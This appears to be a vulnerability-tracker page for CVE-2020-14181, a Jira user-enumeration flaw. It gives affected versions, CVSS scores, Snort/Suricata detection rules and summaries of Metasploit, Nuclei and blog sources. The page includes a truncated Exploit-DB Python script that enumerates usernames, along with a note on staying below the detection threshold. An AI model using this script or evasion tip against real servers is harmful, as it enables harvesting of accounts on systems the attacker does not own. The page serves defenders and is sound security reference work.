CVE-2020-14181
published 2020-09-17CVE-2020-14181: Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the…
PriorityP264medium5.3CVSS 3.1
AVNACLPRNUINSUCLINAN
EXPLOIT
EPSS
99.60%
99.9th percentile
Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint. The affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0.
Affected
11 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| atlassian | data_center | < 7.13.6 | 7.13.6 |
| atlassian | data_center | >= 8.0.0 < 8.5.7 | 8.5.7 |
| atlassian | data_center | >= 8.6.0 < 8.12.0 | 8.12.0 |
| atlassian | jira | < 7.13.6 | 7.13.6 |
| atlassian | jira_server | >= 8.0.0 < unspecified | unspecified |
| atlassian | jira_server | >= 8.0.0 < 8.5.7 | 8.5.7 |
| atlassian | jira_server | >= 8.6.0 < unspecified | unspecified |
| atlassian | jira_server | >= 8.6.0 < 8.12.0 | 8.12.0 |
| atlassian | jira_server | >= unspecified < 7.13.6 | 7.13.6 |
| atlassian | jira_server | >= unspecified < 8.5.7 | 8.5.7 |
| atlassian | jira_server | >= unspecified < 8.12.0 | 8.12.0 |
Detection & IOCsextracted from sources · hover to see the quote
snort
alert http any any -> [$HTTP_SERVERS,$HOME_NET] any (msg:"ET EXPLOIT Possible Jira User Enumeration Attempts (CVE-2020-14181)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/ViewUserHover.jspa?username="; fast_pattern; threshold: type limit, count 30, seconds 45, track by_src; reference:cve,2020-14181; classtype:attempted-recon; sid:2031066; rev:2; metadata:created_at 2020_10_21, cve CVE_2020_14181, deployment Perimeter, deployment Internal, deployment SSLDecrypt, performance_impact Moderate, confidence Medium, signature_severity Minor, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_10_21;)
- →Detect user enumeration attempts by monitoring for repeated GET requests to /ViewUserHover.jspa?username= — the Snort/ET rule triggers on 30 requests within 45 seconds from the same source IP.
- →A vulnerable server will respond WITHOUT the string 'User does not exist' for valid usernames, and WITH it for invalid ones — differential response analysis can confirm exploitation. ↗
- →Nuclei template detection: look for HTTP 200 responses to GET /secure/ViewUserHover.jspa containing both 'user-hover-details' and 'content="JIRA"' in the response body.
- →Shodan queries 'http.component:"Atlassian Jira"' and 'http.component:"atlassian jira"' can be used to identify internet-exposed Jira instances for proactive asset discovery.
- →The exploit requires no authentication — any unauthenticated GET request to the endpoint with a username parameter is sufficient to probe for valid accounts. ↗
- ·The Snort/ET rule (sid:2031066) uses a threshold of 30 requests in 45 seconds per source IP — low-and-slow enumeration campaigns below this rate will evade the rule.
- ·The Metasploit module was tested only on specific versions (8.4.1, 8.5.6, 8.10.1, 8.11.0); behavior on other affected versions may differ. ↗
- ·The Nuclei template only confirms the endpoint is reachable and returns Jira-specific content (max-request: 1); it does not confirm active exploitation or successful enumeration.
CVSS provenance
nvdv3.15.3MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET EXPLOIT Possible Jira User Enumeration Attempts (CVE-2020-14181)
suricata·2020-10-21·CVSS 5.3
CVE-2020-14181 [MEDIUM] ET EXPLOIT Possible Jira User Enumeration Attempts (CVE-2020-14181)
ET EXPLOIT Possible Jira User Enumeration Attempts (CVE-2020-14181)
Rule: alert http any any -> [$HTTP_SERVERS,$HOME_NET] any (msg:"ET EXPLOIT Possible Jira User Enumeration Attempts (CVE-2020-14181)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/ViewUserHover.jspa?username="; fast_pattern; threshold: type limit, count 30, seconds 45, track by_src; reference:cve,2020-14181; classtype:attempted-recon; sid:2031066; rev:2; metadata:created_at 2020_10_21, cve CVE_2020_14181, deployment Perimeter, deployment Internal, deployment SSLDecrypt, performance_impact Moderate, confidence Medium, signature_severity Minor, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_10_21;)
Exploit-DB
Atlassian JIRA 8.11.1 - User Enumeration
exploitdb·2021-03-10·CVSS 5.3
CVE-2020-14181 [MEDIUM] Atlassian JIRA 8.11.1 - User Enumeration
Atlassian JIRA 8.11.1 - User Enumeration
---
# Title: Atlassian JIRA 8.11.1 - User Enumeration
# Author: Dolev Farhi
# Vulnerable versions: version ')
print('e.g. python3 script.py https://jiratarget.com usernames.txt')
sys.exit()
if len(sys.argv) < 3:
help()
server = sys.argv[1]
usernames = sys.argv[2]
random_user = '0x00001'
try:
os.path.exists(usernames)
except:
print(usernames, 'file does not exist.')
sys.exit(1)
def test_vulnerable():
resp = requests.get('{}/secure/ViewUserHover.jspa?username={}'.format(server, username))
if 'User does not exist: {}'.format(random_user) in resp.text:
return True
return False
if test_vulnerable is False:
print('server is not vulnerable.')
sys.exit(1)
f = open(usernames, 'r').read()
for username in f.splitlines():
resp = requests.get('{}/secur
Metasploit
Jira Users Enumeration
metasploit
Jira Users Enumeration
Jira Users Enumeration
This module exploits an information disclosure vulnerability that allows an unauthenticated user to enumerate users in the /ViewUserHover.jspa endpoint. This only affects Jira versions < 7.13.16, 8.0.0 <= version < 8.5.7, 8.6.0 <= version < 8.11.1 Discovered by Mikhail Klyuchnikov @__mn1__ This module has been tested on versions 8.4.1, 8.5.6, 8.10.1, 8.11.0
Nuclei
Jira Server and Data Center - Information Disclosure
nuclei·CVSS 5.3
CVE-2020-14181 [MEDIUM] Jira Server and Data Center - Information Disclosure
Jira Server and Data Center - Information Disclosure
Jira Server and Data Center is susceptible to information disclosure. An attacker can enumerate users via the /ViewUserHover.jspa endpoint and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. Affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0.
Template:
id: CVE-2020-14181
info:
name: Jira Server and Data Center - Information Disclosure
author: bjhulst
severity: medium
description: Jira Server and Data Center is susceptible to information disclosure. An attacker can enumerate users via the /ViewUserHover.jspa endpoint and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. A
Recorded Future
Analyze Recent Atlassian Vulnerabilities and Keep Your Infrastructure Protected
blogs_recorded_future·CVSS 9.6
[CRITICAL] Analyze Recent Atlassian Vulnerabilities and Keep Your Infrastructure Protected
## Analyze Recent Atlassian Vulnerabilities and Keep Your Infrastructure Protected
For years, software solutions built by Atlassian have found their way to nearly every organization's software stack. Tools such as JIRA, Confluence, Bamboo, and BitBucket are often seen playing a crucial role in various departments across enterprises.
From managing projects or handling organization-wide documentation, to hosting the very code of a product being developed by the organization, the constant reliance upon and amount of historical data held within these applications have turned them into a lucrative target for attackers, expanding the attack surface in the process.
## Historical Atlassian Vulnerabilities
Traditionally, vulnerabilities within the Atlassian software stack have originated from d
Recorded Future
Analyze Recent Atlassian Vulnerabilities and Keep Your Infrastructure Protected
blogs_recorded_future·CVSS 9.6
[CRITICAL] Analyze Recent Atlassian Vulnerabilities and Keep Your Infrastructure Protected
# Analyze Recent Atlassian Vulnerabilities and Keep Your Infrastructure Protected
For years, software solutions built by Atlassian have found their way to nearly every organization's software stack. Tools such as JIRA, Confluence, Bamboo, and BitBucket are often seen playing a crucial role in various departments across enterprises.
From managing projects or handling organization-wide documentation, to hosting the very code of a product being developed by the organization, the constant reliance upon and amount of historical data held within these applications have turned them into a lucrative target for attackers, expanding the attack surface in the process.
## Historical Atlassian Vulnerabilities
Traditionally, vulnerabilities within the Atlassian software stack have originated from di
2020-09-17
Published